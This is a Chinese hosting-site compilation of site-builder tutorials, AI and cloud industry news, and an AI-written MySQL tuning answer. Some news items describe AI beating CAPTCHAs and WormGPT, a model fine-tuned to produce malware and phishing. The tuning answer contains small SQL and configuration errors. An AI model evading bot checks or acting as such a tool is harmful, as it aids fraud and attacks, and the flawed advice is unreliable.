文件上传没有特殊要求,可以上传mp3音频、文档文件、压缩文件等。 3 空间扩容 如果空间不足,可以点击进入应用中心进行扩容,应用中心带有超大存储扩展包,需要通过度点进行购买,如果站点度点余额不足,在我的应用 -> 我的度点里进行充值购买,需要使用百度智能云账户执行购买操作。 4 展示视频/文件列表 元素自由列表里可以拖拽动态列表绑定文件或者视频,可以参考系统实例,支持自由设计 #### aipage网站选项卡容器使用 网站里选项卡使用很广泛,例如百度智能云官网就大量使用了选项卡切换交互,使用选项卡能更友好的展示信息,提供更好的用户体验。 1 选项卡使用 添加空白自由版块,拖拽元素 -> 容器 -> 横向选项卡到空白版块中,选项卡是高级容器,每一个选项卡内部的元素编辑与普通容器内编辑一致,通过箭头上下切换选项卡项,进入设置和样式给选项卡设计样式及标题等设置。 纵向选项卡的使用与横向选项卡类似,添加纵向选项卡然后设计选项内元素即可,纵向选项卡的差异是每一项的宽度是固定的。 2 自定义选项卡切换 除了选项卡自带的切换效果,可以借助视图控制搭配其他元素来实现更丰富的切换支持。首先去除标签的标题和图标以及顶部边框隐藏默认自带的选项卡头部 添加支持点击交互的元素,考虑到需要添加激活状态,推荐使用菜单元素里面的横向多行带图标菜单,给每个菜单项设置点击交互,选择视图控制并配置激活选项卡对应的帧数,配置好后预览点击菜单就能自动切换选项卡了。 除此之外也可以使用按钮、图片等支持点击交互的元素来控制选项卡,例如添加左右箭头图标就能实现与轮播元素类似的效果。 3 选项卡设计高级下拉导航 选项卡除了显示页面内容,也可以加到自由导航中设计网站高级下拉菜单,选项卡设计好每项内容后,添加到导航版块合适位置,然后开启默认不激活及超出隐藏即可。由于选项卡是通用容器,因此下拉菜单中可以任意定制下拉效果,而且每个下拉菜单设计不一样的效果,例如如下用户使用示例: #### aipage页面中出现双滚动条如何处理 网站页面如果出现多个滚动条,一般是因为有元素移出到页面宽度以外的区域,主要在页头版块和页尾版块中出现比较常见。找到对应的元素重新调整位置即可修复此问题,定位的方法是通过左侧页面视图显示隐藏版块和元素来进行查找。 首页挨个关闭版块的眼镜(优先头尾版块),然后保存后预览查看双滚动条是否存在,找到对应版块后对版块内部的元素重复此操作,直到找到正确的元素为止。如果元素在界面外无法进行编辑,可以在视图里直接删除。 #### AI代理浏览器Opera Neon Opera Neon 是挪威科技公司 Opera 推出的一款 AI 代理浏览器,致力于通过人工智能代理为用户提供更智能的上网体验 。以下是关于它的详细介绍: 核心特点 AI 引擎与上下文感知:搭载的 AI 引擎能够理解和解读用户的需求,具备上下文感知能力,可代用户执行各种任务,如进行研究、构建和设计用户所需的内容。 离线任务处理:即便用户处于离线状态,它也能同时处理多项任务,例如创建游戏、报告、代码片段和网站等。 主要功能 Neon Chat:类似其他 AI 聊天机器人,可通过聊天机器人界面搜索网络、回答问题、解释正在浏览的网页内容、生成图像、总结文章,并从当前打开的网页中获取 “上下文信息”。 Neon Do:是 “Browser Operator” AI 代理的升级版,用户可让 AI 代理自主完成网页交互操作,如浏览网站、填写信息、预订、购买、注册等,能理解网站内容并替用户执行任务,所有 AI 处理都在本地进行,以确保隐私和安全。 Neon Make:利用云技术为用户执行复杂任务,如生成报告、设计游戏原型、构建 Web 应用,甚至托管并与其他用户共享,还可以在用户离线时编写代码。 定位与收费模式 Opera 将 Opera Neon 定义为 “代理浏览器”,是一款付费订阅产品,目前具体价格和发布时间尚未公布,不过已开放早期试用者的名单申请,用户可在官方网站加入候补名单。 意义与影响 Opera Neon 的出现标志着浏览器技术进入了一个新阶段,它将人工智能深度融入浏览体验中,使 AI 从被动辅助转向主动服务,极大改变人们与网络互动的方式。 #### AI公有云服务市场规模达44.1亿元 百度智能云排第一 6月22日 消息:今日,数据研究机构IDC咨询发布数据显示,2021全年,AI公有云服务市场规模达44.1亿元人民币,占AI软件整体市场的13.4%。 从年度增速的角度来看,AI公有云服务市场增速依然远超AI软件整体市场增速。而在未来2-3年,整体AI市场中私有化部署仍将是主流。 IDC咨询分析称,相比人工智能整体市场,AI公有云服务市场格局相对稳定,2021下半年甚至2021全年的市场份额中,百度智能云位居第一,阿里云紧随其后,华为云市场份额也不断上升,腾讯云、亚马逊云科技、京东云等也贡献了一定的市场份额。 数据还显示,人脸人体领域近几年已经达到一定的市场规模,2021相比2020年人脸人体公有云服务市场规模仍然实现80.1%的增长;NLP市场2021年相比2020年实现126.9%的增长;智能语音公有云服务市场已经经历过高速增长,2021年相比2020年市场规模增长52.3%。对话式AI的市场,2021年相比2020年增长109.6%。另外,机器学习公有云服务市场2021年相比2020年实现100%以上的增长。 #### AI冲击波及建站生态:从独立主题商店到前端框架的商业困境 1月11日行业观察,近期多位独立开发者和建站服务商反映,传统网站建设和主题销售业务正受到生成式AI工具的显著冲击。一位从业者在周报中坦言:“现在基本没人找我们建站了,连我们精心开发的WordPress主题也销量骤减。”他特别提到,其团队投入大量精力开发的“深度自定义与模块化设计的WordPress企业主题”市场反响冷淡,购买者寥寥。 针对这一现象,行业讨论普遍将原因指向以Vibe Coding为代表的AI编程工具的发展。许多开发者认为,当前用户只需提供精准的提示词,AI便能生成质量不错的页面,尤其对于结构简单的页面,完全可替代人工编码或购买成品主题。这导致付费主题的市场需求正在被快速侵蚀。 更值得关注的是,这股冲击波已蔓延至更底层的前端工具链。近日,知名开源前端框架Tailwind CSS的开发团队宣布了一项重大的收缩决策。其创始人Adam Wathan在关闭一个关于为官方文档增加“AI友好”(llms.txt)端口的Pull Request时,详细解释了背后的商业困境。 Adam Wathan指出,尽管Tailwind CSS因其“原子化CSS”的语义性和简洁性,成为了AI生成UI代码的“首选框架”,其使用量(月npm下载量达3000万次)持续增长,但团队却面临严重的商业可持续性危机。他透露,官方文档的访问量较2023年初已下降高达40%。 这一数据下滑对Tailwind的商业化构成了直接打击。Tailwind CSS本身是开源免费项目,其商业产品“Tailwind Plus”(提供专业UI组件和模板)主要依靠开发者查阅官方文档时产生的曝光来获取客户。如今,大量开发者转向直接向ChatGPT、Cursor等AI编码助手提问并获取解决方案,甚至直接生成样式代码与组件,导致付费产品的潜在客户转化路径被大幅削弱,营收出现断崖式下跌。 最终,严峻的财务压力迫使Tailwind CSS团队裁掉了75%的员工。目前团队仅剩5人(包括3位创始人和2名员工)。Adam Wathan承认,开源项目的流行度与商业成功之间出现了“反向关系”。团队亟需在未来6个月内探索出AI时代的新商业模式(例如转向生成式引擎优化或SaaS服务),否则项目可能因资金断裂而陷入停摆。 此次从应用层(WordPress主题)到工具层(前端框架)相继遭遇的挑战,清晰地揭示了生成式AI正在重塑整个网站开发与设计产业链的现状。对于无数依赖此生态的中小开发者与团队而言,如何在技术效率提升与商业模式生存之间找到新的平衡点,已成为一个迫在眉睫的严峻课题。Tailwind CSS的未来出路尚未可知,但其当前的困境无疑为整个行业敲响了警钟。 #### ai域名Chat.com于2023年以1,550万美元成交! 去年多次转手的Chat.com域名,在2023年的交易价格为1550万美元,这一消息得到了多家域名行业媒体的确认和报道。此次交易不仅刷新了域名交易市场的纪录,也引起了全球域名行业的广泛关注。 Chat.com是一个历史悠久、含义广泛的域名,它涵盖了“聊天”、“交流”等多种语义,非常适合社交平台、在线教育、客户服务等多个领域。据报道,Chat.com的这次交易背后是由Hilco Digital Assets的Andrew Miller和Larry Fischer协助完成的。这两位在域名交易领域有着丰富的经验和深厚的人脉,他们的参与确保了交易的顺利进行。 Chat.com的成交价格不仅彰显了域名的商业价值,也为其他域名交易提供了参考。它的成交价格表明,顶级域名仍然具有极高的市场价值,这对于域名持有者和投资者来说都是一个积极的信号。此外,Chat.com的交易也可能推动其他高质量域名的价格上升。 根据报道,Chat.com的净成交价格为1550万美元,包括了托管费和相关费用。这一价格是由Dharmesh Shah支付的,他是HubSpot的联合创始人兼首席技术官。他在接受采访时透露了这一交易细节,使得之前关于Chat.com交易价格的种种猜测得以证实。 除了Chat.com之外,域名交易市场上还有许多其他值得关注的交易。例如,域名Connect.com也被Dharmesh Shah以超过1000万美元的价格收购,并在短时间内出售获利。此外,OpenAI公司也被曝出以1100万美元的价格买下了AI.com域名,显示出人工智能领域域名的强劲需求。 Chat.com的域名交易是一个标志性的事件,它体现了域名作为互联网资产的价值,并预示着域名交易市场未来的发展趋势。随着互联网的发展和域名重要性的日益凸显,预计未来将有更多的域名以高价成交。 #### AI域名要火,阿里云率先使用tongyi.ai 8 月 19 日消息,阿里大语言模型“通义千问”今日宣布启用新域名“tongyi.ai”,并带来多项新功能。 目前随着生成式AI的爆火,AI域名也水涨船高,.AI 是一个国家代码顶级域名(ccTLD),它代表安圭拉岛(Anguilla),这是一个位于加勒比海的英国海外领土。.AI 域名最初是为安圭拉岛设计的,但由于它与“人工智能”(Artificial Intelligence)的缩写相同,这个域名逐渐受到科技公司和与人工智能相关的项目的青睐。 想用AI域名的同学需要注意,AI域名由于没有国内代理商,因此无法在国内完成网站备案,也就是说根本无法绑定国内服务器,主机帮看了下,目前阿里云也是用tongyi.ai来做跳转而以,根本无法真正使用。 还有,AI域名价格贵得离谱,两年注册费用高达1150元,而且是最低两年起注册。 所以,综合上面的情况,AI域名应该是割韭菜的域名,不建议站长使用。 #### AI大火后AI相关域名值钱了 AI大火后,有关于AI的相关域名值钱了,比如今天主机帮在站长论坛看到一位米农,一个拼音的AI域名(aiyinyue.com)卖了八万六。 如果是以前这类域名其实是不值钱的,以往值钱的域名往往是双拼或者数字,但到了AI时代, ai相关的域名值钱起来了,有做AI相关内容的需求的,并不在意这点域名钱,所以站长们可以研究下注册相关域名做网站,哪怕最后网站赚不到钱,卖域名也是可以的。 #### AI搜索重塑信息版图:是“信息平权”还是“质量隐忧”? 当AI开始为我们筛选信息,它的选择标准与传统搜索引擎有何不同?一项来自德国学术机构的研究对此进行了量化分析,发现AI搜索工具正在悄然改变信息引用的格局。 核心发现:流量“孤岛”成为AI信息新源研究显示,AI搜索引擎(如谷歌AI概览、Gemini、GPT-4o)显著倾向于引用那些在传统谷歌搜索中排名不靠前、甚至是非常冷门的网站。具体而言: 53% 的谷歌AI概览引用来源,未进入传统搜索的前十。 40% 的来源,甚至未进入传统搜索的前一百。 这意味着,大量在传统流量规则下被淹没的“信息孤岛”,正通过AI的引用进入主流视野。 双重影响:信息多样性提升与内容完整性挑战 积极面:AI带来了信息来源的“去中心化”,可能促进了信息多样性。同时,以GPT为代表的AI更偏爱企业官网和百科,减少了社交媒体噪音。 消极面:AI习惯于对信息进行“压缩”和总结,这可能导致次要细节和模糊性的丢失。在面对多义词或复杂议题时,传统搜索提供的多角度信息可能更具参考价值。 未来挑战:如何评估新一代搜索工具?研究并未简单判定孰优孰劣,而是指出当前评估体系的不足。未来的评价标准需超越简单的“相关性”,综合考量信息源的多样性、概念覆盖的完整性以及答案的整合能力,才能为AI搜索时代建立科学的“导航图”。 #### ai模型生图也有版权?北京互联网法院开审中国首例 “AI文生图” 案 凤凰网科技讯8月28日,据北京互联网法院官方账号发文表示,北京互联网法院近日依法公开开庭审理了一起“AI文生图”著作权案,该案为我国首例涉 “AI文生图”案。 该案庭审过程由中央广播电视总台新闻中心进行全媒体直播,清华大学法学院知识产权法研究中心主任崔国斌教授、计算机图像算法工程师黄影元作为节目嘉宾,对 AI 生成内容涉及的技术与法律问题进行了讨论。节目在央视新闻客户端、新媒体平台及北京互联网法院官方抖音号、快手号、视频号同步直播。 该案中,原告李某某利用Stable Diffusion 模型,通过输入提示词的方式,生成了一张人物图片,后将该图片以 “春风送来了温柔” 为名发布在某网络平台。被告刘某某在个人账号上使用该图片作为文章配图发布。李某某以侵害作品署名权和信息网络传播权为由将刘某某起诉到北京互联网法院。据悉,双方当事人在庭审现场展开了激烈的辩论。 涉案图片是否构成作品?如果构成作品,李某某是否享有对该图片的著作权?刘某某使用图片的行为是否侵犯了署名权和信息网络传播权?如果侵权成立,刘某某应当如何承担责任? 原告李某某认为,模型的选择、提示词及反向提示词的输入、生成参数的设置均可以体现出其独创性智力劳动,涉案图片具有独创性;被告刘某某未获得原告李某某的许可,截去了李某某在某网络平台的署名水印,使得相关用户误认为刘某某为该作品的作者,严重侵犯了李某某享有的署名权及信息网络传播权,应当赔偿李某某的经济损失并进行赔礼道歉以消除影响。 被告刘某某辩称,其所发布主要文章内容为原创诗文而非涉案图片,没有商业用途,不具有侵权故意;涉案图片是其通过网络检索获取的,具体来源已无法提供,使用时也不确定李某某是否对涉案图片享有权利。 该案目前仍在进一步审理中,预计审理结果将在近段时间公布。 你们认为原告李某某合理吗? AI生图的版权问题在国外一直有争议,美国法院那边判纯AI生成的图片是不受版权保护的,按原告的只是提示词和参数由AI生成的图片在美国是没有版权的,不知道国内该怎么判。 主机吧偏向于被告方,因为如果由AI生成的图片就有版权的话,那太乱了,AI生成的图片不具备独立性,大家只要输入相同的提示词和参数是不是就可以生成同样的图片呢?就可以说我有这个版权呢? 而且玩过AI的同学都知道,AI生成的图有很多相似之处,不能说一模一样,只能说风格基本差不多,要是受版权保护的话,那太离谱了。 主机吧认为拿自己原创的画然后通过AI去修饰的生成的图片才具备版权保护。 #### AI破解了CAPTCHA 网站验证系统 9 月 24 日消息,互联网时代,网站如何判断访问者是人类用户还是机器人?其中一个被广泛部署的解决方案,就是 CAPTCHA 验证系统。不过在迈入 AI 时代后,CAPTCHA 验证系统的识别和防御能力被大打折扣。 用户在访问某些网站时,可能就会遇到 CAPTCHA 验证系统,要求用户从 9 张图片中,筛选汽车、自行车、桥梁或红绿灯等,来证明是人类访问者。 根据苏黎世联邦理工学院(ETH Zurich)的最新研究,AI 现在可以成功击败这些谜题。 这款人工智能解谜软件建立在一个被广泛使用的人工智能图片处理模型之上,该模型被称为“You Only Look Once(YOLO)”。 科学家通过 14000 张标有街道的照片作为训练数据,再加上一点时间,科学家们就能让 AI 像人类一样一次性准确识别 reCAPTCHAv2 版本验证码。 #### AI突破人机验证防线:ChatGPT自主代理成功绕过Cloudflare CAPTCHA 7月29日消息,OpenAI开发的自主人工智能“ChatGPT Agent”展现出一项令人惊讶的能力:它成功绕过了互联网上广泛使用的反机器人工具——Cloudflare的“我不是机器人”CAPTCHA验证系统。这款设计用于在线执行复杂多步骤任务的AI代理,却轻松越过了本应阻止它的关键安全屏障。 这一事件最初在Reddit平台的r/OpenAI论坛上曝光。用户“logkn”分享的截图显示,ChatGPT Agent正在操作一个视频转换网站。截图中,该代理清晰地描述了其操作步骤:它点击了“验证您是人类”的复选框,并继续执行任务,同时实时报告其动作。 ChatGPT Agent在操作时解释道:“链接已经插入,现在我将点击‘验证您是人类’复选框,以完成Cloudflare的验证。这一步是必要的,以证明我不是机器人,并继续执行操作。” 这一场景极具反讽意味:AI一边明确表示需要“证明自己不是机器人”,一边却轻而易举地绕过了专门用于识别和阻止机器人的防护措施。这不仅突显了AI代理在模仿人类在线行为方面取得的显著进展,也对以CAPTCHA为代表的传统反机器人工具的有效性提出了严峻挑战。长期以来,CAPTCHA系统一直作为数字世界的“守门人”,依赖对人类简单、对机器困难的任务来区分人机。 据了解,ChatGPT Agent在安全的沙盒环境中运行,拥有独立的虚拟操作系统和浏览器,能够访问真实的互联网。用户可以通过ChatGPT界面实时监控AI的操作过程。重要的是,在执行可能产生实际后果的动作(例如完成在线购买)之前,该代理必须获得用户的明确授权。 #### AI网站建设,dora AI ChatGPT版网站开发平台 Dora AI是一个基于人工智能技术的网站开发平台,它利用了类似于OpenAI的ChatGPT模型来简化网站创建的流程。用户只需输入他们想要的文本描述,Dora AI就可以在几分钟内自动生成一个完整的网站。这个过程不需要用户具备传统的编程技能或深入了解网站设计的复杂性。 Dora AI平台的工作原理是通过自然语言处理(NLP)技术理解用户的文本指令,然后利用预训练的机器学习模型生成HTML、CSS和JavaScript代码来构造网页。这样的自动化流程使得非技术用户也能够快速搭建出专业看起来的网站,从而降低了网站开发的门槛。用户可以在Dora AI的界面中选择不同的模板和布局,也可以自定义颜色、字体和其他设计元素,以满足他们的特定需求。生成的网站可以是单页应用,也可以是多页网站,具有响应式设计,能够在不同设备上良好显示。Dora AI平台的上线标志着网站建设领域向更加智能化、自动化方向的发展。随着技术的进步,我们可以预期未来会有更多类似的工具出现,进一步简化网站开发和设计的过程。 地址:https://www.dora.run/ #### ai解决网站慢日志过多问题 目前AI挺强的,尤其是解决一些网站相关问题,回答相当专业,可以作为不错的参考,只需要把网站出现问题的状态截个图发到AI上,咨询就可以得到不错的答案,比如下面这个是一张客户网站出现慢日志过多的问题解决办法。 从你提供的图片来看,网站产生了大量的慢日志,主要问题可能是数据库查询性能较差。以下是一些解决方法,帮助你优化数据库性能并减少慢日志: 1. 分析慢查询 查看慢查询日志:确认哪些查询是慢查询,以及它们的执行时间。 使用工具分析:使用 MySQL 的 EXPLAIN 命令分析查询执行计划,找出性能瓶颈。 2. 优化查询语句 减少复杂查询:避免使用过多的 JOIN 和嵌套查询,尽量简化查询逻辑。 避免使用 LIKE 通配符:LIKE '%keyword%' 会导致全表扫描,尽量使用索引友好的查询。 限制返回的数据量:使用 LIMIT 限制返回的行数,避免一次性查询过多数据。 3. 添加索引 为常用查询字段添加索引:例如,wp_posts.post_title 和 wp_posts.post_content 是查询条件,可以为这些字段添加索引。 复合索引:如果查询条件中有多个字段,可以考虑创建复合索引。 4. 调整数据库配置 增加查询缓存:启用 MySQL 的查询缓存,减少重复查询的执行时间。 调整内存参数:增加 innodb_buffer_pool_size 等参数,提高数据库的内存使用效率。 5. 优化表结构 减少冗余字段:删除不必要的字段,减少表的大小。 分区表:对于大数据表,可以考虑分区表来提高查询性能。 6. 硬件升级 增加内存:数据库性能通常受限于内存,增加内存可以显著提升性能。 使用 SSD:将数据库存储迁移到 SSD 上,减少磁盘 I/O 延迟。 7. 使用缓存机制 启用对象缓存:使用 Redis 或 Memcached 缓存频繁查询的数据,减少数据库负载。 页面缓存:对动态生成的页面进行缓存,减少数据库查询次数。 8. 定期维护数据库 优化表:定期运行 OPTIMIZE TABLE 命令,减少表碎片。 更新统计信息:运行 ANALYZE TABLE 更新表的统计信息,帮助查询优化器生成更好的执行计划。 9. 限制慢查询的执行 设置慢查询超时:在数据库配置中设置 query_cache_timeout,限制慢查询的执行时间。 使用连接池:减少频繁的连接和断开,提高数据库的响应速度。 10. 监控和优化 持续监控:使用工具(如 pt-query-digest 或 Percona Toolkit)定期分析慢查询日志。 逐步优化:针对最慢的查询逐步优化,确保每次优化都有所改进。 示例优化 假设你的查询是: SELECT SQL_CALC_FOUND_ROWS wp_posts.ID FROM wp_posts LEFT JOIN wp_term_relationships ON (wp_posts.ID = wp_term_relationships.object_id) WHERE 1=1 AND ( wp_term_relationships.term_taxonomy_id IN (179) OR wp_posts.post_title LIKE '%keyword%' OR wp_posts.post_content LIKE '%keyword%' ) 优化建议: 移除 SQL_CALC_FOUND_ROWS:这个函数会增加查询开销,可以使用 COUNT(*) 替代。 为 post_title 和 post_content 添加全文索引: ALTER TABLE wp_posts ADD FULLTEXT(post_title post_content); 然后使用 MATCH ... AGAINST 替代 LIKE: SELECT wp_posts.ID FROM wp_posts LEFT JOIN wp_term_relationships ON (wp_posts.ID = wp_term_relationships.object_id) WHERE 1=1 AND ( wp_term_relationships.term_taxonomy_id IN (179) OR MATCH(post_title, post_content) AGAINST ('keyword') ) 总结 通过分析慢查询、优化查询语句、添加索引、调整数据库配置等方式,可以显著减少慢日志的产生。如果问题仍然存在,可以考虑硬件升级或使用缓存机制。希望这些建议能帮助你解决问题! #### AI让网站编辑失业了,什么值得买大裁员,审核基本交给AI 早在AI出来的时候,主机帮就发现AI几乎可以完全替代网站编辑,特别购物类的,基本上只要知道这个商品的名字、编号就可以给你自动罗列这个商品的详细介绍,特点等,写得比人工还好,那么AI替代人类编辑是必然的。 果然,预感的没有错,国内知道的淘宝客类网站什么值得买今日被爆大裁员了,有业内人士称本月初什么值得买编辑岗位裁员30%-40%,好价爆料审核工作基本全部交给AI,部分品类组全部优化,一个不剩。 据了解,什么值得买于2010年上线,是值得买科技创立的网购产品推荐网站,汇总了来自不同平台的商品折扣、促销活动和限量抢购等信息,并且允许用户分享购物攻略和产品使用体验。 2012年开始因赶上移动互联网浪潮迎来高速发展,2019年7月15日登陆创业板,成为消费内容赛道的第一家A股上市公司。 2023年,值得买科技将AIGC列为年度重点战略,成立了独立的AI事业部,并率先开展AI在消费内容应用上的研究。 在近日接受采访时,值得买科技CTO王云峰透露,值得买科技将在旗下AI购物助手“小值”的基础上,于上半年推出独立消费Agent(智能体)产品。 此外,值得买科技打造的“什么值得买”智能体已陆续接入Kimi、智谱清言、讯飞星火、海螺AI、腾讯元宝和字节豆包等大模型平台,以满足不同场景下的用户需求。 #### AI让阿里云百度智能云收入大增:新一轮云服务高潮已至 2025年2月,中国云计算市场迎来历史性转折点——AI技术从“工具”升级为“核心引擎”,推动头部云厂商收入实现跨越式增长。阿里云与百度智能云最新财报数据表明,AI与云服务的深度融合不仅重塑了行业竞争格局,更开启了新一轮云服务增长浪潮。 AI成云服务增长“核动力” 阿里云在2024年第四季度实现营收317.42亿元,同比增长13%,增速较上一季度(7%)接近翻倍。其核心驱动力来自AI相关产品收入连续六个季度三位数增长,公共云业务因此实现双位数增长。阿里云通过优化产品结构,将资源向高利润率的公共云倾斜,同时加大AI基础设施投入,其经调整EBITA利润率稳定在10%,稳居国内唯一盈利云厂商。通义千问大模型家族的开源生态效应显著,衍生模型数量超9万个,全球下载量占比达26.6%,成为技术壁垒的重要支点。 百度智能云同样表现亮眼:2024年第四季度营收同比增长26%,AI相关收入激增近3倍,文心大模型日调用量突破16.5亿次。通过“开源引流+云服务生态”双轮驱动,百度将大模型能力深度融入企业端场景,验证了AI技术商业化的高效路径。李彦宏曾预言的“AI原生应用重构所有行业”正在成为现实,智能云业务已成为百度核心利润增长极。 技术开源与生态竞争:云厂商的“新战场” 两大巨头的增长路径虽不同,但均指向AI与云服务的深度协同: 阿里云以“全球化+行业化”为轴,通过通义千问大模型赋能零售、金融、汽车等行业,其AI算力集群已服务全球超10万家企业,公共云收入占比持续提升至70%以上。 百度智能云则凭借开源战略抢占先机,继文心大模型全面免费后,又率先接入DeepSeek模型提供超低价服务,吸引超30万开发者入驻千帆平台,形成“模型即服务”的生态闭环。 IDC报告指出,2025年全球AI云服务市场规模将突破5000亿美元,中国市场的复合增长率(CAGR)预计达93.6%。这一趋势背后,是AI技术从“单点突破”转向“全栈渗透”:大模型训练、推理服务、AI原生应用开发等场景需求激增,倒逼云厂商重构技术架构与商业模式。 未来:AI将定义云服务新规则 行业共识认为,AI正在改写云服务的竞争规则: 技术普惠化:大模型训练成本下降90%(如DeepSeek模型推理价格低至0.1元/千tokens),推动AI从“奢侈品”变为“日用品”; 生态开放化:开源模型下载量年增300%,开发者生态成为云厂商获客的核心入口; 场景垂直化:医疗、制造、政务等传统行业AI渗透率突破40%,定制化解决方案需求爆发。 阿里云与百度智能云的财报数据,不仅印证了AI的商业化潜力,更揭示了未来云市场的竞争焦点——技术迭代速度、生态开放程度、行业场景深耕能力。随着阿里计划“未来三年AI基础设施投入超过去十年总和”,百度加码万卡算力集群建设,这场由AI驱动的云服务革命,正将全球数字化进程推向新高度。 结语AI与云服务的“化学反应”已不可逆。当技术红利从实验室走向产业端,云厂商的竞争不再是简单的资源堆砌,而是生态、场景与技术的多维融合。阿里云与百度智能云的爆发式增长,或许只是AI重塑云计算市场的开端。 #### AI黑客都来了,没有道德限制”的 WormGPT 聊天机器人:可自动生成木马、钓鱼链接 7 月 17 日消息,据安全分析公司 SlashNext 表示,有黑客日前开发出了一款名为 WormGPT 的 AI 工具,黑客声称“该 AI 工具没有任何限制,专为协助网络犯罪分子而设计,可以自由生成一系列恶意代码,或创建网络钓鱼攻击”。 SlashNext 表示,WormGPT 最早在今年 3 月首次出现,并在 6 月推出了正式版本,黑客当下正在对外销售该 AI 工具的使用权限。 ▲ 图源 SlashNext 黑客在售卖页表示:“该 AI 工具旨在提供 ChatGPT 的替代方案,便于用户执行各种与黑帽相关的活动,让任何人都可以在家中舒适地进行恶意活动。” 黑客声称,为了创建这个聊天机器人,他们使用了 2021 年推出的一种名为 GPT-J 的较旧但开源的大型语言模型。然后,该模型经过对恶意软件创建相关数据的训练,从而最终形成了 WormGPT。 ▲ 图源 SlashNext 黑客以每月 60 欧元(IT之家注:约 480.98 元人民币)或每年 550 欧元(约 4408.95 元人民币)的价格销售该 AI 工具的使用权限,设计 WormGPT 的黑客还上传了截图,显示用户可以要求该工具生成使用 Python 编程语言编写的恶意软件。 安全分析公司 SlashNext 取得了 WormGPT 使用权限,并进行了一系列测试,并表示: 结果令人不安,WormGPT 制作的钓鱼邮件不仅非常有说服力,而且在战略上也很狡猾,展示了其邪恶潜力。 ▲ 图源 SlashNext 安全公司据此认为,随着 AI 技术的普及,此类“完全为网络攻击而生”的 AI 工具恐将受到黑客所滥用,从而带来重大威胁。 #### Akamai CDN海外企业入华使用的CDN 节点,将由火山引擎、腾讯云、网宿科技提供 之前主机邦有发文过Akamai CDN将要退出中国,不再为用户提供国内的CDN,国内访问将转至邻国的CDN节点。不过目前来看,情况要好一些,国内节点将由将由火山引擎、腾讯云、网宿科技提供。 1 月 3 日,Akamai 官方发文称:为满足全球不同国家和地区的法规要求,对于海外企业入华的 CDN 业务,我们将通过中国的合作伙伴火山引擎、腾讯云、网宿科技,为客户提供高性能且安全合规的本地化解决方案和服务,确保客户的业务平稳运行。 海外用户如果需要使用国内节点应该还是需要备案的,就是不知道海外企业要如何备案呢? 而国内用户想要用Akamai 的CDN的话,就只能买除中国大陆外的海外CDN节点了,算不上全球加速,这竞争力一下子就没了。 Akamai 之所以退出中国,从官方发文上可以看出,其之所以不再提供国内节点,真正原因是法律问题,因为国内电信业务是不给外资企业参与的,虽然前几年一直有说放开市场给外国企业登陆,不过也只是传传而以,根本没有落实,国外企业根本不让你做IDC业务,想要进来都是跟国内的服务商合作,比如亚马逊amazon就是跟北京光环新网科技股份有限公司合作的。 #### Akamai DNS 全球性故障导致众多知名网站和在线服务瘫痪! Akamai正在调查一起影响许多知名网站和在线服务的持续性故障,包括 Steam、PlayStation Network、Newegg、AWS、亚马逊、谷歌和Salesforce等。虽然Akamai已经承认了该问题,并将其归咎于Edge DNS服务问题,但这家公司仍在努力寻找导致这起事件的根本原因。该公司在Edge DNS服务事件通告中表示:“我们已意识到Edge DNS服务出现了问题。”“我们正在积极调查问题。如果您因该问题而有疑问或受到影响,请联系Akamai技术支持部门。”“我们第一时间为您提供最新的现有信息,提供的信息可能会发生变化、更正和更新。”据Akamai声称,Edge DNS是其基于云的权威DNS解决方案,旨在提供24/7全天候不间断的DNS可用性,并提高DNS响应能力。受影响的服务:Akamai在Twitter上也确认了这个问题,声称会在接下来的30分钟内发布最新消息。该公司现已部署了修复程序以解决这个持续性问题,预计所有客户的服务会恢复正常。Akamai表示,故障不是网络攻击造成的。Akamai现在披露,这次全球性故障的原因是“软件配置更新触发了DNS系统中的一个bug。”“今天15点46分,软件配置更新触发了DNS系统中的bug,该系统负责将浏览器引导到各个网站。这导致了故障,从而影响了一些客户网站的可用性。”“故障持续长达一个小时。回滚软件配置更新后,服务恢复正常运行。Akamai可以确认这不是一起针对Akamai平台的网络攻击。”“我们为由此带来的不便深表歉意。我们正在审核软件更新流程,以防将来出现故障。”上个月,Fastly CDN服务器遭到另一起全球性故障,一大批网站和在线服务因此受到影响,包括亚马逊、Reddit、Twitter、Spotify和IT安全外媒BleepingComputer。 #### AlphaSSL 证书是哪家公司的 AlphaSSL是全球著名SSL证书颁发机构GlobalSign旗下的信息安全产品,是专业的SSL证书提供商,主要提供便宜的SSL证书。AlphaSSL证书属于入门级SSL证书,目前仅支持域名验证(DV SSL证书),所以价格相对较低,通常一年只要几百元,便可为个人网站提供最基本的安全保护。AlphaSSL证书的审核过程简单,签发速度快,申请流程很简单,CA机构只需验证域名所有权,域名验证通过后CA便会签发证书1。此外,AlphaSSL证书除了价格便宜之外,还带有兼容性强、强大的加密功能的优点,所有流行的浏览器和移动设备都可以识别AlphaSSL证书。AlphaSSL证书的产品线很简单,主要针对的是DV类型单域名及通配符两种,其根证书来自于GlobalSign Root CA颁发1998年根证书,浏览器兼容性是目前世界99.9%,并且支持国内的OCSP本地网络,拥有极为优势的网络传输。值得注意的是,虽然AlphaSSL证书价格便宜,但是如果是企业网站的话,还是建议选择GlobalSign旗下品牌的安全级别高的企业型OV SSL证书或增强型EV SSL证书,以加强网站信息安全保护。 #### AMD yes!Cloudflare开始使用AMD芯片服务器! 目前在服务器市场越来越多少公司采用了AMD了,日前64核AMD EPYC再次胜出,因为这款升级版芯片在没有增加能耗的情况下提升了性能。 互联网基础设施公司Cloudflare近日透露,它无法将英特尔放入其新的自制服务器中,原因是英特尔芯片的能耗实在太大了。平台运营工程师Chris Howells在周二发布的博文中披露,自2020年年中以来,Cloudflare 一直致力于面向第11代服务器的设计。Howells写道:“我们评估了英特尔最新一代的‘Ice Lake’至强处理器。虽然英特尔的芯片在原始性能方面能够与AMD相竞争,但每台服务器的功耗要高出数百瓦,相差太大了。”这是要命的缺点——Cloudflare的评估表明,它为部署到全球200多个边缘站点的服务器采用了AMD的64核EPYC 7713。节能还影响了Cloudflare决定在新设计中从三只磁盘改为两只磁盘。一对1.92TB三星硬驱取代了之前设计中的三只三星960GB硬驱。最终好处是容量增加了1 TB,而功耗减少了6瓦。Howellls的文章还显示,测试所得的数据表明,Cloudflare为服务器配备512GB内存并没有带来足够的性能提升,因而无法证明这笔费用的合理性。因此,该公司选择了384GB内存,但确实从DDR4-2933升级至DDR4-3200,因为成本的小幅增加带来了性能的合理提升。Cloudflare坚持使用Mellanox ConnectX-4 